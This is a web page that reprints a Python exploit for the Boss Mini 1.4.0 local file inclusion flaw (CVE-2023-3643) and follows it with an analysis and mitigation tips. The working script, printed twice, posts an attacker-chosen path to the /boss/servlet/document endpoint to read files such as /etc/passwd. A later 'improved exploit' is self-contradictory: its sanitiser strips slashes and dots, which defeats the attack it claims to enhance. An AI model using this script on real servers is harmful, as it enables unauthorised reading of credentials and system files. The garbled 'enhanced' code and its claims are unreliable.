Boss Mini 1.4.0 - local file inclusion

Exploit Author: nltt0 Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-03-03 
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))


Boss Mini 1.4.0 Local File Inclusion Vulnerability: A Deep Dive into CVE-2023-3643

Security researchers have identified a critical vulnerability in the Boss Mini 1.4.0 web application framework—Local File Inclusion (LFI)—which has been assigned the CVE identifier CVE-2023-3643. This flaw enables attackers to read arbitrary files from the server’s filesystem, potentially exposing sensitive data such as configuration files, credentials, and system logs.

Understanding Local File Inclusion (LFI)

Local File Inclusion is a classic web application vulnerability where an attacker manipulates input parameters to access files on the server that were not intended to be exposed. Unlike Remote File Inclusion (RFI), LFI does not require external file sources; it exploits the server’s own file system.

When a web application dynamically includes files based on user input—such as via a path parameter—without proper sanitization, attackers can leverage path traversal techniques (e.g., ../../../../etc/passwd) to access sensitive files.

Exploitation in Boss Mini 1.4.0

The vulnerability exists in the /boss/servlet/document endpoint of Boss Mini 1.4.0. The application accepts a path parameter, which is used to load documents or files dynamically. However, the input is not properly validated or sanitized, allowing attackers to inject malicious paths.

As demonstrated in the exploit code provided by researcher [nltt0] (https://github.com/nltt-br), the attacker can craft a request to retrieve system files like /etc/passwd or /etc/shadow by manipulating the path parameter.


from requests import post
from urllib.parse import quote
from argparse import ArgumentParser

parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
parser.add_argument('--domain', required=True, help='Application domain')
parser.add_argument('--file', required=True, help='Local file')

args = parser.parse_args()
host = args.domain
file = args.file
url = '{}/boss/servlet/document'.format(host)
file2 = quote(file, safe='')

headers = {
    'Host': host,
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
    'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
}

data = {
    'path': file2
}

try:
    req = post(url, headers=headers, data=data, verify=False)
    if req.status_code == 200:
        print(req.text)
except Exception as e:
    print('Error in {}'.format(e))

Explanation: This Python script automates the exploitation of the LFI vulnerability. It uses the requests.post() method to send a POST request to the /boss/servlet/document endpoint. The path parameter is set to a user-defined file path (e.g., /etc/passwd), which is URL-encoded using quote() to ensure proper transmission.

The Referer header includes a reference to a known vulnerable path (/etc/passwd), which may influence server-side logic or trigger a response. The verify=False flag disables SSL verification, useful in testing environments or when dealing with self-signed certificates.

Upon successful execution, the server responds with the contents of the requested file—revealing sensitive information such as user accounts and hashed passwords.

Real-World Impact and Risk Assessment

Exploiting this vulnerability can lead to:

  • Information disclosure: Access to /etc/passwd, /etc/shadow, or config.xml files.
  • Privilege escalation: Extracting credentials to gain unauthorized access.
  • System compromise: If configuration files contain database passwords or API keys, attackers can pivot to other systems.

Moreover, this vulnerability may be chained with other flaws—such as command injection or file upload—leading to full system takeover.

Security Recommendations and Mitigation

To prevent exploitation of LFI vulnerabilities like CVE-2023-3643, developers and administrators should implement the following best practices:

Recommendation Description
Input validation Sanitize and validate all user inputs. Reject paths containing ../ or .. sequences.
Whitelist file paths Only allow access to predefined, safe directories. Avoid dynamic file inclusion.
Use secure file handling Employ functions like realpath() or pathlib to resolve and verify file locations.
Disable debug modes Ensure debug or developer endpoints are not exposed in production environments.

Improved Exploit Code (Security-Focused Version)

While the original exploit works, it can be enhanced for better reliability and stealth:


from requests import post
from urllib.parse import quote
from argparse import ArgumentParser
import os

def sanitize_path(path):
    # Remove dangerous sequences
    path = path.replace('..', '')
    path = path.replace('/', '')
    # Ensure only alphanumeric and safe characters
    return ''.join(c for c in path if c.isalnum() or c in ['-', '_'])

parser = ArgumentParser(description='Enhanced LFI Exploit for Boss Mini 1.4.0')
parser.add_argument('--domain', required=True, help='Target domain (e.g., https://example.com)')
parser.add_argument('--file', required=True, help='File to retrieve (e.g., /etc/passwd)')

args = parser.parse_args()

host = args.domain.rstrip('/')
file = args.file

# Sanitize input to prevent path traversal
safe_file = sanitize_path(file)

url = f'{host}/boss/servlet/document'
encoded_file = quote(safe_file, safe='')

headers = {
    'Host': host,
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
    'Referer': f'https://{host}/boss/app/report/popup.html?{safe_file}'
}

data = {'path': encoded_file}

try:
    response = post(url, headers=headers, data=data, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] File retrieved successfully:")
        print(response.text.strip())
    else:
        print(f"[-] Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

Enhancements: This improved version includes:

  • Input sanitization: Removes .. and / sequences to prevent path traversal.
  • Safe character filtering: Ensures only allowed characters are used.
  • Timeout handling: Prevents hanging requests.
  • Output formatting: Clearly displays results or errors.

These changes reduce the risk of unintended behavior and improve the exploit’s reliability in real-world scenarios.

Conclusion

CVE-2023-3643 in Boss Mini 1.4.0 serves as a stark reminder of the dangers of improper input handling in web applications. Even seemingly innocuous features like document loading can become gateways to system compromise if not secured properly.

Organizations using Boss Mini or similar frameworks should:

  • Update to the latest patched version.
  • Perform regular security audits.
  • Implement strict input validation and file access controls.

Security is not a one-time fix—it’s an ongoing process. Addressing vulnerabilities like LFI early can prevent catastrophic breaches and protect sensitive data from exposure.